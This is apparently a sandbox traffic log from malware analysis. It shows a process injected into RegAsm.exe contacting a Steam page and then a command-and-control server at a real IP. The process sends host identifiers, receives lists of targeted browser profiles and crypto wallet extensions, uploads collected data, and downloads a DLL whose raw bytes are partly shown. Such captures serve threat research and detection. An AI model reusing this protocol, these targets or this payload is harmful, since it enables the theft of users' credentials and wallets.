                                                                                  2024-05-15 18:35:51 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                  2024-05-15 18:35:51 UTC10074INData Raw: 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22
                                                                                  Data Ascii: a class="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="
                                                                                  2024-05-15 18:35:51 UTC11067INData Raw: 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f 55 52 4c 5f 53 48 41 52 45 44 5f 43 44 4e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 68 61 72 65 64 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4c 41 4e 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6c 61 6e 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 4e 52 26 71 75 6f 74 3b 3a 26 71 75
                                                                                  Data Ascii: EB&quot;:true,&quot;WEBSITE_ID&quot;:&quot;Community&quot;,&quot;BASE_URL_SHARED_CDN&quot;:&quot;https:\/\/shared.cloudflare.steamstatic.com\/&quot;,&quot;CLAN_CDN_ASSET_URL&quot;:&quot;https:\/\/clan.cloudflare.steamstatic.com\/&quot;,&quot;SNR&quot;:&qu


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.44973195.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:35:51 UTC233OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:35:52 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:35:52 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:35:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.44973295.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:35:53 UTC325OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 279
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:35:53 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 42 44 44 35 42 42 46 31 38 45 34 31 38 36 36 34 38 36 36 33 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                  Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="hwid"BBDD5BBF18E41866486636-a33c7340-61ca-11ee-8c18-806e6f6e6963------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------
                                                                                  2024-05-15 18:35:53 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:35:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:35:53 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 3a1|1|1|0|5e2114c344718c2740c7f8c85866bab9|1|1|1|0|0|50000|00


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.44973395.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:35:54 UTC325OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAF
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:35:54 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------FHCAEGCBFHJDGCBFHDAFCont
                                                                                  2024-05-15 18:35:55 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:35:55 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:35:55 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                  Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.44973495.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:35:55 UTC325OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDH
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:35:55 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------DBKFHCFBGIIJKFHJDHDHCont
                                                                                  2024-05-15 18:35:56 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:35:56 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:35:56 UTC5605INData Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                  Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.44973595.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:35:57 UTC325OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----DBAAFIDGDAAAAAAAAKEB
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 332
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:35:57 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------DBAAFIDGDAAAAAAAAKEBCont
                                                                                  2024-05-15 18:35:57 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:35:57 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:35:57 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.44973695.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:35:58 UTC326OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 7081
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:35:58 UTC7081OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------GDAAKFIDGIEGDGDHIDAKCont
                                                                                  2024-05-15 18:35:59 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:35:59 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:35:59 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.44973795.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:35:59 UTC241OUTGET /sqlx.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:00 UTC248INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:35:59 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 2459136
                                                                                  Last-Modified: Sun, 12 May 2024 18:14:05 GMT
                                                                                  Connection: close
                                                                                  ETag: "664106ed-258600"
                                                                                  Accept-Ranges: bytes
                                                                                  2024-05-15 18:36:00 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                  2024-05-15 18:36:00 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                  Data Ascii: X~e!*FW|>|L1146
                                                                                  2024-05-15 18:36:00 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                  Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                  2024-05-15 18:36:00 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                  Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
